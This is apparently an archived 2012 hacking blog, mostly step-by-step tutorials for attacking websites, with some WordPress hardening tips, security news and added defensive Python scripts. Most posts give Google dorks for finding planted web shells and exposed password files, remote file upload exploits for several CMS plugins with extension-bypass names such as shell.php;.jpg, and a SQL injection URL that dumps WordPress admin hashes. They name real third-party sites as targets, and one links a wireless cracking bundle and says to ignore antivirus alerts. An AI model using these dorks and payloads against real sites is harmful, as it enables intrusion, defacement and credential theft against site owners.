Saturday, 28 January 2012

Find Uploaded shells and Passwords By Google dorks (priv8 dorks)

Go to Google.com and type these dorks, and you will get a lot of uploaded shells in the Google search results.

Dorks for finding shells:

inurl:.php "cURL: ON MySQL: ON MSSQL: OFF"

"Shell" filetype:php intext:"uname -a:" "EDT 2010"

intitle:"intitle:r57shell" [ phpinfo ] [ php.ini ] [ cpu ] [ mem ] [ users ] [ tmp ] [ delete ]

inurl:"c99.php" & intext:Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

inurl:"c100.php" & intext:Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout


intitle:"Shell" inurl:".php" & intext:Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update


Dorks for finding Passwords:

filetype:htpasswd htpasswd
intitle:"index of" ".htpasswd" -intitle:"dist" -apache -htpasswd.c
index.of.private (something private)
intitle:index.of master.passwd
inurl:passlist.txt (to find password lists)
intitle:"index of..etc" passwd
intitle:admin intitle:login
"incorrect syntax near" (sql script error)
intitle:"the page cannot be found" inetmgr (weakness in IIS4)
intitle:index.of ws_ftp.ini
"supplied arguments is not a valid postgresql result" (possible SQL weakness)
_vti_pvt password intitle:index.of (frontpage)
inurl:backup intitle:index.of inurl:admin
"index of /backup"
index.of.password
index.of.winnt

inurl:"auth_user_file.txt"
"index of /admin"
"index of /password"
"index of /mail"
"index of /" +passwd
"index of /" +.htaccess
index of ftp +.mdb allinurl:/cgi-bin/ +mailto
allintitle: "index of/admin"
allintitle: "index of/root"
allintitle: sensitive filetype:doc
allintitle: restricted filetype :mail
allintitle: restricted filetype:doc site:gov
administrator.pwd.index
authors.pwd.index
service.pwd.index
filetype:config web
gobal.asax index
inurl:passwd filetype:txt
inurl:admin filetype:db
inurl:iisadmin
inurl:"auth_user_file.txt"
inurl:"wwwroot/*."
allinurl: winnt/system32/ (get cmd.exe)
allinurl:/bash_history
intitle:"index of" .sh_history
intitle:"index of" .bash_history
intitle:"index of" passwd
intitle:"index of" people.1st
intitle:"index of" pwd.db
intitle:"index of" etc/shadow
intitle:"index of" spwd
intitle:"index of" master.passwd
intitle:"index of" htpasswd
intitle:"index of" members or accounts
intitle:"index of" user_carts or user _cart
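
A site owner can turn the two lists above into a self-audit of their own document root. The following is an added example, not code from the original post: it flags files whose names appear in the password dorks, PHP files containing marker strings from the shell dorks, and directories without an index file (which an auto-indexing server would list). The function names, the choice of markers and the sample tree are assumptions made for the illustration.

```python
import os
import re
import tempfile

# File names taken from the password dorks listed in this post.
SENSITIVE = re.compile(
    r"\.htpasswd|\.bash_history|\.sh_history|passwd|master\.passwd|shadow|"
    r"pwd\.db|ws_ftp\.ini|auth_user_file\.txt|passlist\.txt|.+\.pwd|.+\.mdb",
    re.IGNORECASE,
)
# File names and page strings taken from the shell dorks listed in this post.
SHELL_FILENAMES = {"c99.php", "c100.php"}
SHELL_MARKERS = (b"r57shell", b"FTP brute", b"Self remove")
INDEX_FILES = {"index.html", "index.htm", "index.php"}
SCRIPT_SUFFIXES = (".php", ".phtml")


def audit_docroot(root):
    """Walk a document root and return a list of (finding, relative_path)."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames.sort()  # deterministic traversal order
        rel_dir = os.path.relpath(dirpath, root)
        # No index file: the directory is listed if auto-indexing is enabled.
        if not INDEX_FILES & {name.lower() for name in filenames}:
            findings.append(("no-index", rel_dir.replace(os.sep, "/")))
        for name in sorted(filenames):
            rel = os.path.normpath(os.path.join(rel_dir, name)).replace(os.sep, "/")
            lower = name.lower()
            if SENSITIVE.fullmatch(lower):
                findings.append(("sensitive-file", rel))
            if lower in SHELL_FILENAMES:
                findings.append(("shell-filename", rel))
            if lower.endswith(SCRIPT_SUFFIXES):
                with open(os.path.join(dirpath, name), "rb") as handle:
                    head = handle.read(65536)
                if any(marker in head for marker in SHELL_MARKERS):
                    findings.append(("shell-marker", rel))
    return findings


def build_sample_tree(root):
    """Constructed sample document root used to exercise the audit."""
    files = {
        "index.php": b"<?php echo 'home'; ?>",
        ".htpasswd": b"user:constructed-hash\n",
        "backup/passlist.txt": b"constructed\n",
        "uploads/index.html": b"",
        "uploads/img.php": b"<title>r57shell</title>",
    }
    for rel, data in files.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as handle:
            handle.write(data)


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        for kind, path in audit_docroot(tmp):
            print(kind, path)
```

A marker hit is a lead for manual review, not proof of compromise; obfuscated shells will not contain these strings.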

Thursday, 26 January 2012

Wireless Hacking Tools 2011 : Free Download

WiPhire is a Bash script aimed at making the Wireless Hacking process a lot easier. This script was written on Backtrack 4 and designed to be used with Backtrack 4. This script was also designed to be used with the Alfa AWUS036H Wireless adapter with the RTL8187 chipset. If you do not have this chipset but another adapter that is compatible with the aircrack-ng suite, you will need to put it into monitor mode prior to running the script if you wish to use an option that needs monitor mode enabled. This script needs to be run as root.

1. Wireless hacking tool AIO 2009 edition with a few tweaks by tweaker so updated to 2011.
2. Airodump and Aircrack-ng etc. to get WEP and WPA passwords.
3. WiPhire airodump is an 802.11 packet capture program that is designed to "capture as much encrypted traffic as possible...each WEP data packet has an associated 3-byte Initialization Vector (IV): after a sufficient number of data packets have been collected, run aircrack on the resulting capture file. aircrack will then perform a set of statistical attacks developed by a talented hacker named KoreK."

These are the functions of the script :
autoMACtic MAC spoofer
Ability to crack WEP networks
Ability to crack WPA networks
Perform simple MITM attacks
DNSspoof a network
Use airdrop-ng to create a jammer

Programs that WiPhire Uses:
airmon-ng
airodump-ng
aireplay-ng
aircrack-ng
airdrop-ng
xterm
crunch
pyrit
sslstrip
arpspoof
macchanger
kate
apache2
ettercap
Firefox

If a virus alert occurs, disregard it, as these are hacking tools and they will be flagged as viruses no matter what.

Download:
http://hotfile.com/dl/95289912/805d3d5/WHT2OII.rar.html
Mirror 1:
http://www.fileserve.com/file/mCesPNH/WHT2OII.rar
Mirror 2:
http://www.filesonic.com/file/54270824/WHT2OII.rar


"Add Testimonial" : Remote File Upload Vulnerability.

[#1] Open website ..

[#2] Go to this URL: testimonial/add.html.php 

For example:  http://Site.com/testimonial/add.html.php

[#3]
Now Upload Your Deface or any file

[#4] To view your uploaded file go to /images/testimonial/ , you'll see an index of files here ... click on the last file, it's yours !!

[#5] Enjoy=) and do leave a Comment below if you Like it

Demo :
http://sdhealingarts.com/testimonial/add.html.php?
http://slangmediagroup.com/testimonial/add.html.php?
http://thepharmcollective.com/testimonial/add.html.php?
http://www.ganjadaddy.com/demo/firestation/testimonial/add.html.php?


HTML Editor File Upload Vulnerability

Google Dork:
inurl:/HTMLEditor/editor/ 
or 

"inurl:/HTMLEditor/editor//filemanager/"
or
 "inurl:/HTMLEditor/editor//filemanager//connectors/"

Exploit: 
http://website/HTMLEditor/editor/filemanager/connectors/uploadtest.html
or  
http://website/path/HTMLEditor/editor/filemanager/connectors/uploadtest.html

Go here, http://website/HTMLEditor/editor/filemanager/connectors/uploadtest.html
or http://website/path/HTMLEditor/editor/filemanager/connectors/uploadtest.html Change connectors into .php (Like FCKeditor) and upload your file


Supported files: .txt and .jpg; on some sites you can upload .html and .php too

To view your file, go to: http://website/PowerCMS%20folder/files/your file here
or http://website/path//PowerCMS%20folder/files/your file here



Tuesday, 24 January 2012

WPScan v.1.1 is released, a WordPress Security vulnerability scanner

“WPScan is a WordPress Security vulnerability scanner which checks the security of WordPress installations using a black box approach, written in Ruby.”

DETAILS
  • Username enumeration (from author querystring and location header)
  • Weak password cracking (multithreaded)
  • Version enumeration (from generator meta tag and from client side files)
  • Vulnerability enumeration (based on version)
  • Plugin enumeration (2220 most popular by default)
  • Plugin vulnerability enumeration (based on plugin name)
  • Plugin enumeration list generation
  • Other misc WordPress checks (theme name, dir listing, ...)

Change-log for WPScan v.1.1:

  • Detection for 750 more plugins.
  • Detection for 107 new plugin vulnerabilities.
  • Detection for 447 possible timthumb file locations.
  • Advanced version fingerprinting implemented.
  • Full Path Disclosure (FPD) checks.
  • Auto updates.
  • Progress indicators.
  • Improved custom 404 checking.
  • Improved plugin detection.
  • Improved error_log checking.
  • Lots of bugs fixed. Lots of small tweaks.

OpenDNS released preview of DNSCrypt Tool (Secures DNS Traffic)

OpenDNS released a preview of the DNSCrypt tool, a piece of lightweight software that everyone should use to boost online privacy and security. It works by encrypting all DNS traffic between the user and OpenDNS, preventing any spying, spoofing or man-in-the-middle attacks.

For now, DNSCrypt supports only the Mac platform.

DNSCrypt works like SSL in that it wraps all DNS traffic with encryption the same way SSL wraps all HTTP traffic, it's not the crypto library being used. We're using elliptical-curve cryptography, in particular the Curve25519 elliptical curve. The design goals are similar to those described in the DNSCurve forwarder design.

What about DNSSEC? Does this eliminate the need for DNSSEC?

No. DNSCrypt and DNSSEC are complementary. DNSSEC does a number of things. First, it provides authentication. (Is the DNS record I'm getting a response for coming from the owner of the domain name I'm asking about or has it been tampered with?) Second, DNSSEC provides a chain of trust to help establish confidence that the answers you're getting are verifiable. But unfortunately, DNSSEC doesn't actually provide encryption for DNS records, even those signed by DNSSEC. Even if everyone in the world used DNSSEC, the need to encrypt all DNS traffic would not go away. Moreover, DNSSEC today represents a near-zero percentage of overall domain names and an increasingly smaller percentage of DNS records each day as the Internet grows.

That said, DNSSEC and DNSCrypt can work perfectly together. They aren't conflicting in any way. Think of DNSCrypt as a wrapper around all DNS traffic and DNSSEC as a way of signing and providing validation for a subset of those records. There are benefits to DNSSEC that DNSCrypt isn't trying to address. In fact, we hope DNSSEC adoption grows so that people can have more confidence in the entire DNS infrastructure, not just the link between our customers and OpenDNS.

Saturday, 21 January 2012

KindEditor Remote File Upload Exploit

Google Dork:
 
  • intitle:index of? inurl:kindeditor
  • inurl:examples/uploadbutton.html
  
Exploit: http://www.vulnrabewebsite.com/path/kindeditor/examples/uploadbutton.html

Choose any website from the Google search results and go to the vulnerable URL, like http://www.vulnrabewebsite.com/kindeditor/examples/uploadbutton.html. Now click on upload and select your file; it will be automatically uploaded, and you'll get your uploaded file's link/URL there. If you can't get your uploaded file's link, then go to http://www.vulnrabewebsite.com/path/kindeditor/attached/file/
and you'll see a lot of folders there; click on the last folder, and in that folder click on the last file: it's your uploaded file. Enjoy, and do leave a comment if you want more exploits like that, because new articles' posting depends on old articles' popularity.

Live Demo :
http://www.arimlab.com/themes/default/js/kindeditor/examples/uploadbutton.html

Friday, 20 January 2012

43 Excellent WordPress Security Tips & Plugins

After putting in all of the time, and perhaps money, into your WordPress website or blog, it's now time to secure and protect it from outside enemies and general bad guys: hackers, spammers and all round tossers.
Without a doubt, for a self-hosted blog, WordPress is the best blog CMS that you can get. Though it comes packed with security features, being a popular and open source software, it also means that hackers have full access to the code which they can scrutinize to find any exploits they can use to hack into any WordPress-enabled site.
On the good side, one of the best things about WordPress is its plugin system that allows anyone to install any plugins or create their own plugins to extend its functionality, including improving security.
Here, I have listed some WordPress security tips and plugins that you can use to secure your WordPress blog.

Security Tips


1. Nobody should be allowed to search your entire server.

  • WPdesigner advises us NOT to use this search code in search.php:
    <?php echo $_SERVER['PHP_SELF']; ?>
    Nobody should be allowed to search your entire server, right? Use this one instead:
    <?php bloginfo('home'); ?>
  • Block WP- folders from being indexed by search engines; the best way is to block them in your robots.txt file. Add the following line to your list:
    Disallow: /wp-*

2. Directories should not be left open for public browsing

There is a potential problem letting people know what plugins you have, or what versions they are. If there is some known exploit that is linked to a plugin, it could be easy enough for someone to use it to their advantage. Make an empty wp-content/plugins/index.html file or just add this line in your .htaccess file in your root:
Options All -Indexes

3. Drop the version string in your Meta Tags

A large number of WordPress themes have the WordPress meta tag that shows the version of WordPress running on your blog, which is an easy way to leave your blog prone to hackers if you didn’t upgrade to the security-enhanced file permissions on both, as pointed out by Matt Cutts. Another solution involves a plugin that sets up a secondary new version.
This tag, which displays your current version of WordPress, is in the header.php file:
<meta content="WordPress <?php bloginfo('version'); ?>" name="generator" />

4. Stay Updated

You need to keep your plugins/widgets, themes, and WordPress version updated. Also, subscribing to the plugin/widget/theme author’s RSS feeds makes keeping up with them much easier.

5. Take regular backups of your site and Database

You always have to take regular backups of your file directories as well as the database. WordPress Database Backup plugin creates backups of your core WordPress tables as well as other tables of your choice in the same database.

6. Use SSH/Shell Access instead of FTP

If someone gets a hold of your FTP login information (which is usually not encrypted and easy to get), they can manipulate your files and add spam to your site without you even knowing about it! Using SSH, everything is encrypted including the transfer of files, etc.

7. Stop worrying about your wp-config.php file

Keep your database username and password safe by adding the following to the .htaccess file at the top level of your WordPress install:
<FilesMatch "^wp-config\.php$">
deny from all
</FilesMatch>
This will make it harder for your database username and password to fall into the wrong hands in the event of a server problem.

8. Block WP- folders from the Search Engines

There is no need to have all of your WordPress files indexed by Google, so it’s best to block them in your robots.txt file. Add the following line to your list:
Disallow: /wp-*

9. Block access to WP-Admin folder using .htaccess

There is an article written by Reuben that talks about how you can protect your WordPress admin folder by allowing access to it from a defined set of IP addresses. Everything else will bring up a Forbidden error message. So if you only access your blog from one or two places routinely, it’s worth implementing. Also, you’re supposed to create a new .htaccess file inside your wp-admin folder, not replace the one at the root of your blog.

10. Don’t Use Default Passwords

Are you still logging into your wp-admin page with the same default password that was emailed to you? If so, CHANGE IT! You can follow the instructions given in the article “Hack Proof Password” posted by us earlier to improve the strength of your password.

11. Change database table prefix

The default prefix used by WordPress is “wp”. You can easily change the prefix to other terms that are difficult to guess using the WP-Security-Scan. More detail on this plugin below.

12. Don’t use (or better yet, remove) the default “admin” username

When you install WordPress, it automatically generates a user with Administrator-level permissions called admin. It is strongly recommended that you do not use this username to make it harder for the hacker to guess your username and password via Brute force attacks. Even if you downgrade its permission role, it’s still a better idea just to remove this user altogether.
You can use the Change Username Plugin to change the Username of Admin Account.

Security Plugins


13. Secure WordPress

It will help secure WordPress installation by removing miscellaneous items after the installation process which may aid hackers. It will remove error information from the login-page and also remove or change the WP-version data but leave it unchanged in the admin area. It is suggested to remove any unwanted information to the non-admin for security reasons so it will remove update information about plugins, themes and core update information. Secure WordPress will add a blank index.html to the plug-in directory such that if anyone is trying to view the contents of the directory they will be viewing a blank page instead of the contents.

14. Force SSL

Having a secure SSL connection to communicate with your users is beneficial. To enable this, your site must be SSL enabled first. To implement this, you need to buy the SSL certificate. By installing this plug-in it will force your user's browser to connect to your site via an SSL connection. This eliminates any third party attacks between the connection and all the data that is transmitted to and from the site will be encrypted for better security.

15. Chap Secure Login

If you do not have a secure connection like SSL to protect your password, then you can use this plug-in for encrypting passwords. It will use the CHAP protocol to hide the passwords and transmit them encrypted. The only information that is transmitted unencrypted is your username. Protecting the password will give full security because password leaks will enable the hacker to gain full control of your WordPress blog.

16. HTTP Authentication

The HTTP Authentication plugin allows you to use existing means of authenticating users for WordPress. This includes Apache’s basic HTTP authentication module and many others.

17. Anonymous WordPress Plugin

All the WordPress versions 2.3 and above have the feature to get automatic updates for plugins. During this process it will send some of your information like your blog’s URL, version number, list of installed plugins and activated plugins to WordPress.org. This information could be of potential use for hackers. So to avoid this, installing Anonymous WordPress plug-in is a feasible option. It will strip off your blog’s URL and version number and empty the activated plugins list. This plug-in is compatible with WordPress 2.3 and above.

18. Login Encrypt

This will help encrypt the login information using a complex DES and RSA combination. It uses JavaScript to encrypt the user's password and generates a unique DES key. By using this key, users can have a secure login each time they log in to your blog.

19. Admin SSL

This plug-in will work with both private and shared SSL connections and it will force an SSL connection on every page where a password can or has to be entered. It is very helpful to protect the admin area, posts and all the pages of your WordPress installation and secure the login page. This plug-in works on WordPress 2.2 to 2.7.

20. AskApache Password Protect

It will block bots and create a safe wall for any vulnerability your WordPress blog may have. It will protect your password as well as your WordPress directories like wp-includes, wp-content, etc. It is like placing your WordPress blog behind a security wall.

21. TAC (Theme Authenticity Checker)

TAC stands for Theme Authenticity Checker. Currently, TAC searches the source files of every installed theme for signs of malicious code. If such code is found, TAC displays the path to the theme file, the line number, and a small snippet of the suspect code. As of v1.3 TAC also searches for and displays static links.

22. Invisible Defender

This plugin protects registration, login and comment forms from spambots by adding two extra fields hidden by CSS. This approach gave me 100% anti-spam protection on one of my sites.

23. Semisecure Login Reimagined

Semisecure Login Reimagined increases the security of the login process using an RSA public-key to encrypt the password on the client-side when a user logs in. The server side then decrypts the encrypted password with the private key. JavaScript is required to enable encryption. It is most useful for situations where SSL is not available, but the administrator wishes to have some additional security measures in place without sacrificing convenience.

24. Stealth Login

This plugin allows you to create custom URLs for logging in, logging out, administration and registering for your WordPress blog. Instead of advertising your login url on your homepage, you can create a url of your choice that can be easier to remember than wp-login.php, for example you could set your login url to http://www.myblog.com/login for an easy way to login to your website.

25. WordPress File Monitor

Monitors your WordPress installation for added/deleted/changed files. When a change is detected an email alert can be sent to a specified address.

26. WordPress Firewall Plugin

This WordPress plugin investigates web requests with simple WordPress-specific heuristics to identify and stop most obvious attacks. There exist a few powerful generic modules that do this; but they’re not always installed on web servers, and difficult to configure.
It intelligently whitelists and blacklists pathological-looking phrases based on which field they appear within in a page request (unknown/numeric parameters vs. known post bodies, comment bodies, etc.)

27. WordPress Guard Plugin

Angsuman’s WordPress Guard Plugin is a must-have WordPress security plugin that protects the vulnerable areas of your blog from outside access with an additional layer of security.

28. WP-Dephorm

wp-dephorm protects your users from the prying eyes of phorm. This is achieved by setting a cookie to opt out of the phorm information mining. Your blog viewers will not have their information stored and used in marketing campaigns whilst viewing your site.

29. WP Security Scan

Scans your WordPress installation for security vulnerabilities and suggests corrective actions.
-passwords
-file permissions
-database security
-version hiding
-WordPress admin protection/security
-removes WP Generator META tag from core code

30. AntiVirus

AntiVirus for WordPress is a smart and effective solution to protect your blog against exploits and spam injections. AntiVirus protection for your blog.

31. WordPress Exploit Scanner

This plugin searches the files on your website, and the posts and comments tables of your database for anything suspicious. It also examines your list of active plugins for unusual filenames.
It does not remove anything. That is left to the user to do.

32. Paranoid911

Paranoid911 checks your wordpress installation for changes and sends you an email when changes occur.

AntiSpam Plugins


33. Defensio Anti-Spam

Defensio is an advanced spam filtering web service that learns and adapts to your behaviors and those of your readers. Defensio aims to be an all-in-one anti-spam solution. Therefore, using it along with other anti-spam plugins WILL cause problems. PLEASE deactivate Akismet and other similar plugins before activating Defensio.

34. Simple Trackback Validation

Simple Trackback Validation Plugin performs a simple but very effective test on all incoming trackbacks in order to stop trackback spam.

35. NoSpamNX

NoSpamNX is the successor of Yawasp (Yet Another WordPress antispam plugin) and is a plugin to protect against automated comment spam (spambots). While Yawasp changed the names of the form fields in the comment template, NoSpamNX works without these modifications, but is equally effective. By eliminating the need for modifications within the form fields, maximum compatibility with other WordPress plugins or browsers is ensured.
When the comment form is called, NoSpamNX automatically adds extra fields (hidden from the “normal” user) to your comment template. When a comment is saved, these fields are checked. For additional protection, the order and the values of these fields change periodically, so that no spambot can adapt to a specific blog.

36. SI CAPTCHA Anti-Spam

SI CAPTCHA adds CAPTCHA anti-spam methods to WordPress on the comment form, registration form, or both. In order to post comments, users will have to type in the phrase shown on the image. This prevents spam from automated bots. It works great with Akismet.

37. AntiSpam Bee

AntispamBee protects blogs from digital rubbish. It is made up of sophisticated techniques and analyzes comments including pings. Also, for reasons of data privacy, the use of AntispamBee is a safe solution, as it is anonymous and registration-free.

38. Akismet

Akismet is quite possibly the most important and useful plugin you will ever install. It has been developed by the actual team behind WordPress; if that is not enough of a seal of approval and a guarantee, I don’t know what is.
In a nutshell, Akismet checks your comments against the Akismet web service to see if they look like spam or not and lets you review the spam it catches under your blog’s “Comments” admin screen.

39. WP-reCAPTCHA

The reCAPTCHA plugin is one you’ve probably seen around on sites such as Facebook, Twitter and StumbleUpon. It isn’t just your average CAPTCHA (an image containing some letters that are designed so only humans can read them), it uses words from old books, so every time you enter a reCAPTCHA, you’re helping digitise books. At this point, you’re probably thinking but if I’m telling it what the words mean, does that mean I can enter anything? How does that stop spammers? The answer is simple – there are two words, one of which the CAPTCHA knows. The second, it doesn’t and you’re helping digitise it.

Backup Plugins


40. WordPress EZ Backup

WordPress EZ Backup is an administrator's plugin that offers the easiest, most feature-rich method for creating backup archives of your entire site (not just WP installations but any part of your site or webspace), and allows backup archives of any MySQL database you choose, and more.

41. WordPress Database Backup

WordPress database backup creates backups of your core WordPress tables as well as other tables of your choice in the same database.

42. WP-DBManager

Allows you to optimize database, repair database, backup database, restore database, delete backup database, drop/empty tables and run selected queries. Supports automatic scheduling of backing up and optimizing of database.

43. BackUpWordPress

BackUpWordPress is a Backup & Recovery Suite for your WordPress website. This Plugin allows you to backup database as well as files and comes with a rich set of options.

Wednesday, 18 January 2012

Chat with Friends through MS-DOS Command Prompt

All you need is your friend's I.P. Address and your Command Prompt.

  • Then Open Notepad and write this code as it is.....!
@echo off
:A
Cls
echo MESSENGER
set /p n=User:
set /p m=Message:
net send %n% %m%
Pause
Goto A

  • Now save this as "Messenger.Bat".
  • Open Command Prompt.
  • Drag this file (.bat file) over to Command Prompt and press Enter.
  • You would then see something like this:

  • Now, type the I.P. Address of the computer you want to contact and press enter.
  • Now all you need to do is type your message and press Enter.
    Start Chatting.......!

Monday, 16 January 2012

WordPress Plugin : tdo Mini File Upload Vulnerability


Google Dork:
inurl:"plugins/tdo-mini-forms/tdomf-upload-inline.php?tdomf_form_id=1"
Go to google.com and enter this dork.

Now see the results and select any site.......

Now upload your deface as deface.html;.jpg and upload your shell as shell.asp;.jpg or shell.php;.jpg

and see your uploaded file here....
www.site.com/wp/wp-content/uploads/tdomf/tmp/1/Yourfilehere

Sunday, 15 January 2012

New Wordpress Exploit : 10K+ Websites vulnerable through this attack

WordPress Easy Comment Upload Vulnerability:

Google Dork:
  • "inurl:/wp-content/plugins/easy-comment-uploads/upload-form.php"  
  • /wp-content/plugins/easy-comment-uploads/upload-form.php 
  • Index of /wp-content/plugins/easy-comment-uploads

Open Google and enter any dork given above.
Now select any website
and go to this URL: site.com/wp-content/plugins/easy-comment-uploads/upload-form.php
You'll get an upload option here :)
Now upload your deface ....
and check it here: site.com/wp-content/uploads/2011/05/yourfilehere


Note: On some websites you can upload your deface in .txt only ... and you can upload a shell on 50% of sites only ... upload the shell in image format, i.e. shell.asp.jpg


Live Demo :- 
http://www.findthepearl.com/
http://www.findthepearl.com/wp-content/plugins/easy-comment-uploads/
http://www.findthepearl.com/wp-content/plugins/easy-comment-uploads/upload-form.php
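
The file names used in this post and in the tdo Mini Forms post (shell.php;.jpg, shell.asp;.jpg, deface.html;.jpg, shell.asp.jpg) pass any check that looks only at the last extension. The following is an added example, not code from either plugin, of the server-side validation an upload handler needs: a strict name allowlist, a check of every dot-separated segment, a content signature check, and a server-generated storage name. The extension lists and function names are assumptions chosen for the illustration.

```python
import re
import secrets

ALLOWED = {"jpg", "jpeg", "png", "gif", "txt"}
# Extensions that a misconfigured or legacy server may execute or render.
EXECUTABLE = {"php", "php3", "php4", "php5", "phtml", "phar", "asp", "aspx",
              "asa", "cer", "jsp", "cgi", "pl", "py", "sh", "html", "htm", "shtml"}
# Letters, digits, "_" and "-" only, with dot-separated extensions. This alone
# rejects ";" (as in shell.asp;.jpg), path separators, NUL bytes and spaces.
SAFE_NAME = re.compile(r"[A-Za-z0-9][A-Za-z0-9_-]*(\.[A-Za-z0-9]+)+")
# Leading bytes expected for each image type.
MAGIC = {"jpg": b"\xff\xd8\xff", "jpeg": b"\xff\xd8\xff",
         "png": b"\x89PNG\r\n\x1a\n", "gif": b"GIF8"}


def check_upload_name(filename):
    """Validate a client-supplied file name. Returns (ok, reason)."""
    # fullmatch, not match: "$" in a match() pattern would accept "x.jpg\n".
    if not SAFE_NAME.fullmatch(filename):
        return False, "characters outside [A-Za-z0-9._-] or malformed name"
    _stem, *middle, last = filename.lower().split(".")
    if last not in ALLOWED:
        return False, "extension %r not allowed" % last
    # Servers that map handlers by any extension in the name would still
    # run shell.php.jpg, so every segment is checked, not only the last.
    for part in middle:
        if part in EXECUTABLE:
            return False, "executable extension %r inside name" % part
    return True, "ok"


def accept_upload(filename, data):
    """Return (stored_name, reason); stored_name is None when rejected."""
    ok, reason = check_upload_name(filename)
    if not ok:
        return None, reason
    ext = filename.lower().rsplit(".", 1)[1]
    magic = MAGIC.get(ext)
    if magic and not data.startswith(magic):
        return None, "content does not look like " + ext
    # Never store under the client's name: use a random name and keep only
    # the validated extension.
    return secrets.token_hex(16) + "." + ext, "ok"


if __name__ == "__main__":
    # Constructed inputs: the names quoted in the posts plus one benign file.
    for name in ("holiday.jpg", "shell.php;.jpg", "shell.asp;.jpg",
                 "deface.html;.jpg", "shell.asp.jpg", "shell.php"):
        print(name, check_upload_name(name))
```

Name checks are one layer only; the upload directory should also be configured so that the web server never executes scripts from it.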

 



Friday, 13 January 2012

Wordpress FCKEDITOR upload Vulnerability : Upload Your Deface Remotely

This method is also known as the Open Cart OpenCart CMS (Web shop) Exploit. It's an old vulnerability but many people don't know this ... so I'm publishing a tutorial here

  1. open Google.com and enter Dork: 
inurl:admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
or
inurl:Powered By OpenCart
You'll get a lot of websites from Google; select any one ... For example, I got this one
http://www.schoolshopper.com.au/
Then I'll simply add the vulnerability URL after the website

Example
http://www.schoolshopper.com.au/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html

(The path may be changed in other Website , Example site.com/abc/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html)

Now a page will open like this:

Now see the connector option, which is on the top left side of the page, and change the connector to PHP (see the image below),
then see the file upload option and upload your deface or shell,
and to check the shell or deface, check this URL
  • www.site.com/deface.html
  • or
  • www.site.com/shell.php
I have uploaded xd.html here so you can check http://www.schoolshopper.com.au/xd.html
 
FOR PRACTICE.. 

Thursday, 12 January 2012

Simplest way to hack any Wordpress based site

In this post I'll tell you the SIMPLEST WAY TO HACK ANY WORDPRESS BASED SITE.



First we'll use this dork to search for websites with the help of Google:

inurl:"wp-content/plugins/photoracer/viewimg.php?id="


Results: 


I'm now gonna test one of them..

For eg..

http://www.badged.gr/wp-content/plugins/photoracer/viewimg.php?id=2 

Now add the Exploit..

/wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9+from+wp_users--
This is the exploit.. (GIVEN ABOVE)

And now the site address will become..

http://www.badged.gr/wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9+from+wp_users--


Now you can see the ADMIN and PASS....just crack the HASHES and you're done..

Site Admin Login page for WP
http://www.SITE-ADDRESS/wp-login.php
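
Requests like the one above leave a recognisable trace in the web server's access log. The following is an added example, not part of the original post: a Python function that flags requests to viewimg.php whose id parameter is anything other than a plain integer. The log format, the sample lines and the assumption that a legitimate id is always an integer (as in id=2 above) are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in Apache access-log style (documentation IPs, not real traffic).
SAMPLE_LOG = """\
203.0.113.5 - - [12/Jan/2012:10:01:02 +0000] "GET /wp-content/plugins/photoracer/viewimg.php?id=2 HTTP/1.1" 200 5120
203.0.113.9 - - [12/Jan/2012:10:03:40 +0000] "GET /wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9+from+wp_users-- HTTP/1.1" 200 812
203.0.113.9 - - [12/Jan/2012:10:04:11 +0000] "GET /wp-content/plugins/photoracer/viewimg.php?id=-1%20UNION%20SELECT%201,2 HTTP/1.1" 200 640
198.51.100.7 - - [12/Jan/2012:10:04:30 +0000] "GET /wp-content/plugins/photoracer/viewimg.php?id=2%27 HTTP/1.1" 500 310
198.51.100.7 - - [12/Jan/2012:10:05:00 +0000] "GET /index.php?p=12 HTTP/1.1" 200 9000
"""

REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+) [^"]*" (\d{3})')
UNION_RE = re.compile(r"\bunion\b.*\bselect\b", re.IGNORECASE | re.DOTALL)
INTEGER_RE = re.compile(r"[0-9]+")  # assumption: a legitimate image id is digits only


def suspicious_requests(log_text, script="viewimg.php", param="id"):
    """Return (client, status, reason, decoded_value) for every request to
    `script` whose `param` is not a plain non-negative integer."""
    findings = []
    for line in log_text.splitlines():
        match = REQUEST_RE.match(line)
        if not match:
            continue
        client, target, status = match.groups()
        url = urlsplit(target)
        if not url.path.endswith("/" + script):
            continue
        # parse_qs decodes %xx and '+', so encoded payloads are compared in plain form.
        values = parse_qs(url.query, keep_blank_values=True).get(param, [""])
        for value in values:
            if INTEGER_RE.fullmatch(value):
                continue  # the only shape a legitimate image id has
            reason = "union-select" if UNION_RE.search(value) else "non-integer id"
            findings.append((client, int(status), reason, value))
    return findings


if __name__ == "__main__":
    for finding in suspicious_requests(SAMPLE_LOG):
        print(finding)
```

The same integer-only rule, enforced inside the plugin before the value reaches the SQL query, is what removes the injection point.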

Sunday, 8 January 2012

Ping.fm vulnerable to Clickjacking

Two Indian hackers, Aditya Gupta (@adi1391) and Subho Halder (@sunnyrockzzs), have discovered a clickjacking vulnerability in the famous website "Ping.FM". Clickjacking is a malicious technique of tricking Web users into revealing confidential information or taking control of their computer while clicking on seemingly innocuous web pages.

This is based on a technique known as clickjacking (or UI redressing), where an attacker can perform actions on behalf of a user by tricking the user into clicking a button or performing some other action.

This vulnerability was seen earlier in Twitter, which allowed the status to be loaded through the GET method: an attacker could frame the Twitter webpage and trick the user into clicking the tweet button, with the user thinking that it was part of the attacker's webpage.

This can be prevented by setting the X-Frame-Options header to SAMEORIGIN or DENY, which stops the webpage from being loaded inside a frame; Google, Facebook and many other famous websites have adopted it.
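
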